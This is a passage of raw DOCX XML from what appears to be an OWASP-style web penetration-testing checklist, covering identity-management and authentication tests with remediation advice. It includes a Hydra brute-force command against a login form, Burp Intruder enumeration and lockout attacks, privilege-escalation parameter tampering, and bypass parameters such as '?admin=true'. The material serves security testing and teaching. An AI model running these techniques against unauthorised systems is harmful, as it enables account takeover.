    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-IDENT-002  —  Test User Registration Process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Verify identity requirements for registration align with business and security policy (e.g., email verification, identity proofing where required).</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Complete the registration workflow and identify what identity verification (if any) occurs before an account is usable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to register with data belonging to someone else (another user's email) to test for impersonation gaps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check whether an account is fully functional before or only after email/identity verification.</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(Manual browser walkthrough of the registration workflow while proxying through Burp/ZAP)</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Require verified ownership of contact details (email/phone) before granting full account privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate-limit registration attempts to prevent automated mass account creation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-IDENT-003  —  Test Account Provisioning Process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which roles can provision (create) other accounts and what privilege level those provisioned accounts can be granted.</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Identify the account/user creation functionality available to administrative or delegated roles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test whether a lower-privileged provisioning role can create an account with higher privileges than it should be permitted to grant (privilege escalation via provisioning).</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(Burp) intercept the account-creation POST request; modify the role/privilege parameter and resend</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Enforce server-side validation that a provisioning role can only grant privileges equal to or lower than its own.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Log and alert on all account provisioning actions, especially privilege grants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-IDENT-004  —  Testing for Account Enumeration and Guessable User Account</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Browser, Burp Proxy, OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether the application's error messages, response codes, or timing differ between valid and invalid usernames, allowing an attacker to enumerate valid accounts.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Submit a login attempt with a known-valid username and an incorrect password; record the exact error message, HTTP status, and response time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeat with a definitely invalid username and compare all three characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeat the comparison for the 'forgot password' workflow, which frequently leaks enumeration differently than login.</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(Burp Intruder) sniper attack against the username parameter with a list of candidate usernames; compare response length/status/timing</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Return an identical, generic error message and status code regardless of whether the username exists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure response timing is consistent (or intentionally randomized) between valid and invalid usernames.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the same generic response to the password-reset workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-IDENT-005  —  Testing for Weak or Unenforced Username Policy</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Browser, Burp Proxy, OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether account usernames follow a predictable, structured pattern that makes them easy to guess in bulk.</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Review sample usernames (e.g., from public profiles, emails, or support tickets) for an obvious pattern (firstinitial+lastname, sequential IDs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If a pattern is found, generate a candidate list of plausible usernames for the organization and test them against the enumeration technique from OTG-IDENT-004.</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(Custom wordlist generation from company employee names, then Burp Intruder against the identified pattern)</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Avoid predictable username schemes for security-sensitive systems; consider allowing user-chosen, non-obvious usernames or opaque identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pair with strong anti-enumeration and account-lockout controls regardless of username predictability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-IDENT-006  —  Test Permissions of Guest/Training Accounts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Evaluate whether guest or training accounts are appropriately restricted and cannot access functionality reserved for fully authorized users.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Obtain or request a guest/training account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to access every sensitive function normally reserved for standard or privileged users using the guest session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Compare guest account access against the documented access policy.</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(Manual/Burp-proxied testing of the guest account against the full permission matrix built in OTG-IDENT-001)</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Explicitly scope guest/training accounts to a minimal, clearly defined function set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Regularly audit guest account permissions for scope creep.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-IDENT-007  —  Test Account Suspension/Resumption Process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Verify the account suspension and resumption workflow correctly and immediately revokes/restores access, and cannot be abused to regain access improperly.</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Suspend a test account and immediately verify existing sessions are invalidated (not just new logins blocked).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to resume/reactivate the account through any self-service mechanism and verify appropriate identity re-verification occurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check whether suspended-account tokens/API keys remain valid.</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(Manual testing: suspend account via admin panel, then attempt to use an existing active session token/cookie)</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Invalidate all active sessions, tokens, and API keys immediately upon account suspension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Require re-verification of identity for account resumption, not merely a password re-entry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId15"/>
          <w:footerReference w:type="default" r:id="rId16"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication testing targets the mechanisms by which the application verifies user identity — credential transport, lockout policy, password strength enforcement, session/cookie handling of credentials, and alternative authentication channels — looking for ways an attacker could bypass or weaken these controls.</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">AUTHN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-AUTHN-001 – OTG-AUTHN-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHN-001  —  Testing for Credentials Transported over an Encrypted Channel</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Confirm that authentication credentials are never transmitted over an unencrypted (HTTP) channel at any point, including redirects and mixed-content resources.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Proxy the full login flow and inspect every request for HTTP (non-TLS) transmission of the username/password fields.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for HTTP-to-HTTPS redirect chains that briefly expose credentials, and for mixed-content login forms embedded on an HTTP page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify HTTPS is enforced with no fallback to HTTP anywhere in the authentication flow.</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curl -v http://target.com/login  (confirm it redirects to https, and does not accept POST credentials over http)</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Serve the entire login flow exclusively over HTTPS, with HSTS enforced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Never embed a login form on a page served over plain HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHN-002  —  Testing for Default Credentials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 Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether the application or any bundled components (admin panels, DB consoles, IoT interfaces) still use vendor-default or trivially guessable credentials.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Identify the specific software/component in use (from fingerprinting phase) and look up its documented default credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt login with the identified default credential set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test any newly created accounts for a predictable default password pattern assigned by the system.</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hydra -l admin -P default-passwords.txt target.com http-post-form '/login:user=^USER^&amp;pass=^PASS^:F=incorrect'</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Force a mandatory password change on first login for any default/system-provisioned account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove or disable default accounts that are not required for operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHN-003  —  Testing for Weak Lock-Out Mechanism</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Browser, Burp Intruder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Evaluate whether the account lockout mechanism effectively mitigates brute-force password guessing, and whether the unlock process itself resists abuse.</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Submit repeated incorrect login attempts and record the threshold at which lockout occurs (if any).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify lockout duration is reasonable and cannot be trivially bypassed (e.g., by rotating source IP or clearing cookies).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test the account-unlock process for its own weaknesses (predictable unlock link/token, no rate limiting).</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(Burp Intruder) sniper attack submitting incorrect passwords against a fixed username, observing when/if a lockout response appears</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Implement lockout or exponential backoff after a small number of failed attempts, applied per-account and per-source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure the unlock mechanism itself is not exploitable and requires proper identity verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider CAPTCHA or adaptive risk-based controls in addition to hard lockouts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-AUTHN-004  —  Testing for Bypassing Authentication Schema</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protected resources can be reached without valid authentication via forced browsing, parameter tampering, session prediction, or injection.</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Attempt to directly browse to known protected URLs without an authenticated session (e.g., /admin/main.php).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test for authentication bypass via parameter modification (e.g., appending ?authenticated=yes or ?admin=true).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
